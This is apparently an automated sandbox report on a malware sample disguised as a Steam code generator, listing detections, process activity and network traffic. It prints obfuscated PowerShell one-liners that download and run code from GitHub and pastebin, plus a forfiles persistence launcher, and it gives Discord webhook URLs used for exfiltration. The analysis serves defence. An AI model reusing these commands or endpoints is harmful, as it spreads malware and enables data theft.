
Windows Analysis Report
steamcodegenerator.exe

Overview

General Information

Sample name: steamcodegenerator.exe
Analysis ID: 1534102
MD5: d4f1751389516a3dfac98551142cb153
SHA1: f362178e1ecd3eac536b666e89c2aa5663109116
SHA256: eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • steamcodegenerator.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\steamcodegenerator.exe" MD5: D4F1751389516A3DFAC98551142CB153)
    • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5144 cmdline: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5608 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 5196 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1416 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 612 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5368 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: sslproxydump.pcap, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x9bca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x66ff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x29fff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x29fff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: Process Memory Space: powershell.exe PID: 4372, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x70d6a:$b1: ::WriteAllBytes(
  • 0x89ccb:$b1: ::WriteAllBytes(
  • 0xbfead:$b1: ::WriteAllBytes(
  • 0x16086e:$b1: ::WriteAllBytes(
  • 0x1bfe61:$b1: ::WriteAllBytes(
  • 0x936b:$s1: -join
  • 0x93a6:$s1: -join
  • 0x94af:$s1: -join
  • 0x94dd:$s1: -join
  • 0x9877:$s1: -join
  • 0x989a:$s1: -join
  • 0x9bd6:$s1: -join
  • 0x9bf7:$s1: -join
  • 0x9c29:$s1: -join
  • 0x9c71:$s1: -join
  • 0x9c9e:$s1: -join
  • 0x9cc5:$s1: -join
  • 0x9cf0:$s1: -join
  • 0x9d0c:$s1: -join
  • 0x9dd3:$s1: -join
  • 0xa289:$s1: -join
Source: Process Memory Space: powershell.exe PID: 420, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x14de55:$b1: ::WriteAllBytes(
  • 0x173f4e:$b1: ::WriteAllBytes(
  • 0x70f8d:$s1: -join
  • 0x71727:$s1: -join
  • 0xf7fea:$s1: -join
  • 0xfa8ec:$s1: -join
  • 0x4d8c2:$s3: reverse
  • 0x52e59:$s3: reverse
  • 0x897d6:$s3: reverse
  • 0x89ac4:$s3: reverse
  • 0x8a1de:$s3: reverse
  • 0x8a997:$s3: reverse
  • 0x91bd0:$s3: reverse
  • 0x91fea:$s3: reverse
  • 0x92b72:$s3: reverse
  • 0x9381f:$s3: reverse
  • 0xb8f6f:$s3: reverse
  • 0xbe725:$s3: reverse
  • 0x18b8b9:$s3: reverse
  • 0x1924ed:$s3: reverse
  • 0x1945c0:$s3: reverse
Source: amsi64_420.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Source: amsi64_5576.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 6628, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 5144, ProcessName: powershell.exe
Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4372, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\steamcodegenerator.exe", ParentImage: C:\Users\user\Desktop\steamcodegenerator.exe, ParentProcessId: 6628, ParentProcessName: steamcodegenerator.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}, ProcessId: 5144, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T15:53:10.691283+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49983 | 162.159.138.232 | 443 | TCP
2024-10-15T15:53:18.245903+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 162.159.138.232 | 443 | TCP
2024-10-15T15:52:55.501300+0200 | 2857658 | 1 | A Network Trojan was detected | 192.168.2.6 | 49898 | 162.159.138.232 | 443 | TCP


AV Detection

Source: steamcodegenerator.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49983 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49997 version: TLS 1.2
Source: steamcodegenerator.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3398804242.0000020C74740000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398881078.0000020C74774000.00000002.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\steamcodegenerator.exe Code function: 0_2_00007FF71C070478 FindFirstFileExW, 0_2_00007FF71C070478

Networking

Source: Network traffic Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.6:49898 -> 162.159.138.232:443
Source: Network traffic Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49983 -> 162.159.138.232:443
Source: Network traffic Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49997 -> 162.159.138.232:443
Source: unknown DNS query: name: pastebin.com
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View IP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox View IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/json Host: discord.com Content-Length: 216 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/json Host: discord.com Content-Length: 301 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/json Host: discord.com Content-Length: 301 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /user-attachments/files/17267811/stm.txt HTTP/1.1 User-Agent: Downloader Host: github.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /github-production-repository-file-5c1aeb/867932512/17267811?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241015%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241015T135214Z&X-Amz-Expires=300&X-Amz-Signature=25afd796b2e8a581e90ca77d6c3579553f304f13e0def3361890827057d8a907&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dstm.txt&response-content-type=text%2Fplain HTTP/1.1 User-Agent: Downloader Cache-Control: no-cache Host: objects.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: global traffic DNS traffic detected: DNS query: discord.com
Source: unknown HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/json Host: discord.com Content-Length: 216 Connection: Keep-Alive
Source: powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2798056511.000002B39C74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB8161B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt
Source: powershell.exe, 00000011.00000002.2874987774.000001D184B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
